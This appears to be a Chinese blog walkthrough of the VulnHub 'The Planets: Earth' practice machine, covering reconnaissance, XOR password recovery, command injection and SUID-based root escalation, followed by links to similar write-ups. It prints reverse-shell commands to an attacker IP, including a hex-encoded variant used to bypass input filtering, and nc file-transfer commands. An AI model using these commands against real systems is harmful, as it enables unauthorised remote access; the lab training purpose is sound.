vulnhub-The Planets: Earth

最新推荐文章于 2024-06-04 20:00:00 发布
最新推荐文章于 2024-06-04 20:00:00 发布
阅读量547 收藏
点赞数
分类专栏: vulnhub 文章标签: debian linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43006864/article/details/125110509
版权

The Planets: Earth ~ VulnHub

靶机:The Planets: Earth ~ VulnHub

攻击机:

Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux

信息收集

nmap 192.168.1.1/24

开放了22 80 443 继续探测端口详细信息。

又看到了python环境,那基本上就 CVE-2021-4034一打就死。

然后注意看这两个dns记录。

访问一下80和443

都是啥都没有,现在去hosts文件里添加一下这两dns记录。

正常访问

http://earth.local/

 

https://terratest.earth.local/

 

好像也没啥信息。扫描一下目录。

dirb http://earth.local/

发现了疑似登陆界面,

dirb https://terratest.earth.local/ 

这里发现也蛮多的。

访问robots.txt。

 然后,最后一个disallow好像有点东西,但后缀是.*,貌似要加后缀

测试之后发现是txt的后缀

翻译一下

这里给出了三个点个点:

使用的是XOR加密算法

testdata.txt应该是密文。

terra应该是管理员账号。

下面的东西不重要了。

这里我们先搞出来testdata.txt文件。

这里看了大佬的解析,需要用到这里的message

 然后与testdata.txt进行xor运算。

 XOR 运算,中文称为"异或运算"。

它的定义是:两个值相同时,返回false,否则返回true。也就是说,XOR可以用来判断两个值是否不同。

这里套用网上找到的运算脚本

运算后得到:

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

十六进制转文本:

一段重复的文本,密码貌似是我标记出来的部分,试试

earthclimatechangebad4humans

 

 登陆成功

命令行注入。

然后找一下flag

查看一下

拿到flag

然后直接弹shell,使用nc。

nc -lvvp 4321

bash -i >& /dev/tcp/192.168.1.109/4321 0>&1

失败了,了解到这里需要将ip地址转化为16进制。

十进制转换 - 在线进制转换器

bash -i >& /dev/tcp/0xc0.0xa8.0x1.0x6d/4321 0>&1

十六进制是4位,转换器默认会把前几位置0的忽略掉,且只有首位置0其他位的0用x表示。

弹回shell,然后suid提权。

看到了一个这个文件

直接查看是乱码的,

使用

nc -lnvp 4321 > reset_root

nc -w 3 192.168.1.109 4321 < /usr/bin/reset_root 

 

下载下来。

 然后赋权

之前瞎折腾半天,都打不开,编辑不了。

 

看了大佬们的解题过程,要使用strace,

这里先安装,kali我是用

apt install strace

然后试试。

看到了no such file or directory,缺少三个文件。

创建试试,我用的是vim命令

然后执行./reset_root

提示root的密码改为了Earth

登陆一下。

拿到flag

 

 

 

 

 

 

 

 

 

 

 

 

大西瓜的安全之路
关注
专栏目录
vulnhub吧唧——THE PLANETS: MERCURY
xstlikeja的博客
07-15 205
这里我们sudo -l列出所有可以执行的命令和权限时,发现sudo允许用户以root权限来执行一个shell脚本,并为当前用户配置了SETENV,简直就是瞌睡来了遇到枕头了,这个shell脚本的意思就是利用tail(显示文本末尾行的内容)命令显示/var/log/syslog(系统日志文件)最后十行的内容,作为一个weber,我敏锐的嗅觉告诉我,这个shell脚本一定有问题,果不其然,沉淀之后的我就是不一样,一眼就看出(经过高人指点)这个tail不是绝对路径,所以我们可以在这里做下文章。
vulnhub THE PLANETS: EARTH
qq_41696858的博客
12-11 746
本文参考了大佬的文章: https://blog.gibbons.digital/hacking/2021/11/09/earth.html 好久没做靶机了,周末做做靶机挺好的 老三样,先确定靶机地址 arp-scan -I eth0 192.168.200.1/24 靶机地址192.168.200.131 nmap -A -sS -sC -p- 192.168.200.131 返回来80端口和443端口, 两个重要的DNS:DNS:earth.local, DNS:terratest.earth.loca
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3153
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
VulnHub日记(十五): THE PLANETS: EARTH
Dawn_Xi的博客
11-27 2672
参考链接 Vulnhub:THE PLANETS: EARTH 参考博客 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.136 fping -aqg 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.136 dirsearch 枚举目录443和80 dirsearch -u https://192.168.56.136 -w /usr/share/wordlists/dirbuster/directory-lis
Vulnhub:The Planets: Earth
最新发布
weixin_69670995的博客
06-04 937
使用另一个域名在浏览器中访问,发现页面一样,dirb扫描出来的目录也一样,使用https访问另一域名,发现不一样的页面。提示密码使用异或算法,异或字符串放在testdata.txt,用户名是terra,访问testdata.txt。发现程序的作用是更改root密码,但是需要满足一些条件,使用strace进行调试。发现testingnotes文件,不知道后缀,尝试txt的时候访问成功。这里发现三个字符串,先不用管,使用dirb进行目录扫描。发现22,80,443使用浏览器访问80端口。
vulnhub The Planets: Earth
箭雨镜屋
04-20 1024
渗透思路: nmap扫描----探索网站并修改hosts文件----扫描网站目录----探索网站----XOR运算得到terra的admin portal密码----RCE得到反弹shell----发现reset_root有suid----ltrace跟踪库函数发现reset_root执行条件----成功执行reset_root获取root密码并提权
react-360-example-planets:React 360中虚构行星的简单渲染,用于VR。 :globe_showing_Europe-Africa:
02-06
React 360示例-行星 :globe_showing_Europe-Africa: 演示展示了嵌套子级的旋转继承属性。 这并不是要成为行星或气象事件的准确模拟器。 任何试图将此库用于此目的的尝试都可能导致广泛的恐慌。...
solar-system-planets:一个了解我们太阳系行星的网站
04-03
太阳系行星 一个了解我们太阳系行星的网站。 网址: : :construction_worker: 工作正在进行中 消息 出问题了,我能感觉到 笔记 网站尚未完成 动画片 :warning: 在CodePen上找到了太阳系统的动画/由Tady Walsh @...
Three-Planets:WebGL 项目
06-21
文件名"Three-Planets-master"暗示了项目源代码的组织结构,通常"master"是Git仓库的主分支,包含了项目的主要代码和资源。在解压这个文件后,我们可能会看到以下文件和目录: 1. `index.html`:这是项目的主网页,...
the planets: earth靶机
04-11
问题:关于行星:地球和静机。...回答:这个问题似乎出现了编码问题,其中“Earth静机”不是一个有意义的词语,因此无法给出明确的回答。如果问题中的“静机”是指其他行星,可以尝试使用正确的编码再次提交问题。
linux命令之调试工具strace的深入分析
10-27
本篇文章是对调试工具strace的使用进行了详细的分析介绍,需要的朋友参考下
vulnhub靶场——THE PLANETS:EARTH
weixin_61951055的博客
11-19 1034
靶机渗透练习-The PlanetsEarth
Kali中常用打靶工具及命令(随时补充)
zg_111的博客
04-14 1985
Gopherus工具是用来专门生成gopher协议的payload工具,通过gopher协议的以及各种被攻击应用的tcp包特点来构造payload。
[渗透测试学习靶机01] vulnhub靶场 The Planets: Earth
weixin_47112073的博客
10-10 2861
渗透测试学习,vulnhub靶场练习Earth靶机
内网渗透之Linux权限维持-Rootkit后门&Strace监控&Alias别名&Cron定时任务
m0_62207170的博客
05-21 1143
内网渗透之Linux权限维持-Rootkit后门&Strace监控&Alias别名&Cron定时任务
kali修改文件权限不够_Linux下的权限维持
weixin_39956036的博客
10-21 2187
Linux权限维持0X00 关于权限维持什么是权限维持?我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制住目标.0X01 获得初始权限Linux有很多种反弹shell的方法,反弹shell的好处主要是操作过程中会更加方便,对我个人来说,主要是命令补全,总之,从权限维持的角度来说,可以更好的去执行一些操作.能否反弹shell,要根...
强大的 strace 工具
weixin_30820151的博客
08-13 283
什么是 strace straceLinux环境下的一款程序调试工具,用来监察一个应用程序所使用的系统调用。 Strace是一个简单的跟踪系统调用执行的工具。在其最简单的形式中,它可以从开始到结束跟踪二进制的执行,并在进程的生命周期中输出一行具有系统调用名称,每个系统调用的参数和返回值的文本行。 strace有两种运行模式 一:通过它启动要跟踪的进程,在原本的命令前加上strace即...
strace命令工具安装
susun_cool的博客
09-07 2569
当使用strace命令时,提示command Strace not found, 说明没有安装这个命令工具,在 Debian 或 Ubuntu 中,可以通过以下命令安装 strace.安装如果碰到E: unable to locate package问题,说明本地没有找到可用的工具包,需要更新apt-get,可以通过下面这条命令更新apt-get工具来解决。更新apt工具后,重新安装strace即可。有可能还需要加上sudo权限。
如何用strace找出ssh后门
黑火的专栏
03-24 1008
首先我先编译一个ssh后门,这个ssh后门会在/tmp/xxxxxx记录所有的登录密码   启动他   QUOTE:   root@laptop:/usr/local/openssh2/sbin# ps aux | grep sshd   root 13619 0.0 0.3 7432 1752 ? Ss 23:44 0:00 ./sshd -p 1234   roo
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大西瓜的安全之路

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值